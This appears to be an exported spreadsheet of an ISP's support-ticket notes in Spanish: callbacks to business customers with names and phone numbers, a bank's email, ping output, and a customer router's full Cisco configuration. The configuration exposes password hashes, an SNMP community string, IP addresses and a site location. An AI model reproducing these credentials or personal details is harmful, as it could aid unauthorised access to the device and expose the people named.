PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; 'TIC ORELLANA, FRANKLIN' &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; 'TIC-TELECOM@BANRURAL.COM.GT' &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; 'TIC GONZÁLEZ, ANIBAL' &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'AGE824.PLATAFORMA - SANTA MARIA CHIQUIMULA' &lt;AGE824.PLATAFORMA@MAILPRIVADO.BDR&gt;; JAIME.GARCIA@BANRURAL.COM.GT
ASUNTO: RE: SOLICITUD DE ACCESOS || F4627461 || AGENCIA 824
BUENA TARDE,
INFORMO POR ESTE MEDIO QUE EN ESTOS MOMENTO YA SE RESTABLECIÓ LA CONEXIÓN PERO SI SUPLICARÍA VER CUAL REALMENTE ES EL PROBLEMA YA QUE ESTAMOS PRESTANDO UN MAL SERVICIO A NUESTRO CLIENTES.
ATENTAMENTE</t>
  </si>
  <si>
    <t>F4628806</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE CERRANO AL 96680185 SE SOLICITAN DATOS PARA VISITA TECNICA **
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCCION: BARRIO LOS ANDES ENTRE 3 Y 4 TA CALLE 15 AVE.
ATENDERA EN SITIO: JOSE ROMAN PEREZ
-ID 3001930672
**</t>
  </si>
  <si>
    <t>F4628814</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ANDRES SUAREZ 41541178 INDICA QUE NO ESTA EN SITIO PERO QUE AUN SIGUE MUY INESTABLE EL INTERNET SOLICITA QUE SE LE LLAME MAÑANA A LAS 9:00 AM **
-ID 3001979549
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ANDRES SUAREZ AL 41541178 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA ESTABLE PERO SOLICITA QUE SE LE PUEDA ENVIAR POR CORREO LAS PRUEBAS PARA AUTORIZAR EL CIERRE **
-ID 1001073178
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ANDRES SUAREZ 41541178 NO CONTESTO IVR ENVIA A BUZON, TOMAR NOTA QUE A NIVEL DE CLARO, ESTE ENLACE SE OBSERVA ESTABLE:
CC_PINTURAS_DE_GUATEMALA_GT_INTERNET_BODEGA_UNISUR_VILLA_NUEVA#PING 1.1.1.1 SOURCE VLAN 1 RE 8000 DF-BIT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 8000, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.149.163.21
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (8000/8000), ROUND-TRIP MIN/AVG/MAX = 24/28/64 MS</t>
  </si>
  <si>
    <t>F4628824</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A EDWIN TUBAC/CLIENTE; SE LE INDICA COORDINADA VISITA TÉCNICA A PR MAÑANA A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CL REINALDO 30246026 QUIEN INDICA QUE NO SE NECESITAN PERMISOS PARA ESTE SERVICIO, IGUAL SE LE DA FEEDBACK, SE LE COMENTA QUE AVANCES APROX EN 2 HORAS.</t>
  </si>
  <si>
    <t>F4628833</t>
  </si>
  <si>
    <t>**SE LLAMÓ A CLIENTE DAVID AL 37561130 SOLICITA QUE SE LE LLAME EN 30 MIN NUEVAMENTE **
-ID 3001981292
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 37561130 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE. GESTOR N1 AÚN REALIZANDO PRUEBAS CON SERVICIO.</t>
  </si>
  <si>
    <t>F4628838</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS. VALIDANDO LO DICHO EN CRONO ANTERIOR SE MUEVE TICKET.</t>
  </si>
  <si>
    <t>F4628839</t>
  </si>
  <si>
    <t>**SE LLAMÓ A CLIENTE DAVID AL 37561130 SOLICITA QUE SE LE LLAME EN 30 MIN NUEVAMENTE  **
-ID 3001991187
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 37561130 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE. CONSIDERAR QUE A NIVEL DE CLARO ENLACE OK, CLIENTE DEBE VERIFICAR SU RED INTERNA (FORTINET).</t>
  </si>
  <si>
    <t>***SE LLAMÓ A CLIENTE DAVID AL 37561130 SOLICITA QUE SE LE LLAME EN 30 MIN NUEVAMENTE **
-ID 3001981292
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DAVID 37561130 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001001971</t>
  </si>
  <si>
    <t>F4628854</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KAREN 41507733 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001002343</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 56982176 MENCIONA QUE TODO ESTA FUNCIONANDO CORECTAMENTE
SE VALIDA EN EL PRIMER COMENTARIO QUE CLIENTE SOLICITO MONITOREO PARA LAS 16:00
-ID 3001952353</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 16:00 HORAS DE HOY.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KAREN 41507733 MENCIONA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA EN 30MIN
-ID 3001980087</t>
  </si>
  <si>
    <t>F4628888</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LESLY GRAMAJO.  QUIEN ESTA BUSCANDO LOS EQUIPOS.
3001949233
COLA:
NOMBRE: A: 36260784
NÚMERO: 36260784
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 36260784
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 5/07/2022 14:31:32</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO; ADICIONAL SE LLAMÓ A CLIENTE 36260784 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4628892</t>
  </si>
  <si>
    <t xml:space="preserve">SE LLAMA AL TECNICO INDICA QUE SE TUVO CORTE SE JALO DE LA RESERVA 400 METROS PARA PODER SOLVENTAR Y FUSIONAR LOS 4 HILOS SERVICIO OPERATIVO SE PROCEDE CON CIERRE.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 9 HORAS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VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA UPTIME IS 9 HOURS, 0 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C860VAE-ADVSECURITYK9-MZ.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REVISION 0.3) WITH 234496K/26624K BYTES OF MEMORY.
PROCESSOR BOARD ID GMK201003ET
1 DSL CONTROLLER
1 ETHERNET INTERFACE
4 FASTETHERNET INTERFACES
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
57344K BYTES SYSTEM FLASH ALLOCATED
CONFIGURATION REGISTER IS 0X2102
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3494 BYTES
!
VERSION 15.4
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$EAPQ$QHSED/4D1DP.JH6RLZKNW/
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
CLOCK TIMEZONE GUA -6 0
!
!
!
!
!
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
IP DHCP EXCLUDED-ADDRESS 192.168.1.51 192.168.1.254
!
IP DHCP POOL RED_LAN
 NETWORK 192.168.1.0 255.255.255.0
 DEFAULT-ROUTER 192.168.1.1
 DNS-SERVER 168.234.224.5 8.8.8.8
 LEASE 7
!
!
!
IP DOMAIN LOOKUP SOURCE-INTERFACE VLAN1
IP NAME-SERVER 8.8.8.8
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME GESTIONIP SECRET 5 $1$NHKK$V4ZRD.I5HDAS6YCDIXVZF.
!
!
CONTROLLER VDSL 0
!
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.169.206 255.255.255.255
!
INTERFACE ATM0
 NO IP ADDRESS
 SHUTDOWN
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ETHERNET0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE FASTETHERNET1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE FASTETHERNET2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE FASTETHERNET3
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION WAN PRINCIPAL /_/618400003T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.87.20.28 255.255.255.224
 IP NAT OUTSIDE
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.1.1 255.255.255.0 SECONDARY
 IP ADDRESS 186.151.205.181 255.255.255.252
 IP NAT INSIDE
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP NAT POOL LAN_TO_INTERNET 186.151.205.182 186.151.205.182 NETMASK 255.255.255.252
IP NAT INSIDE SOURCE LIST 101 POOL LAN_TO_INTERNET OVERLOAD
IP ROUTE 0.0.0.0 0.0.0.0 10.87.20.1
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_KM 14.2 CARRETERA AL SALVADOR SANTA CATARINA PINULA GUATEMALA
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 101 PERMIT IP 192.168.1.0 0.0.0.255 ANY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NO MODEM ENABLE
 TRANSPORT OUTPUT ALL
LINE AUX 0
LINE VTY 0 4
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
NTP SERVER GT.POOL.NTP.ORG SOURCE VLAN1
!
END
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 71 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 71 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
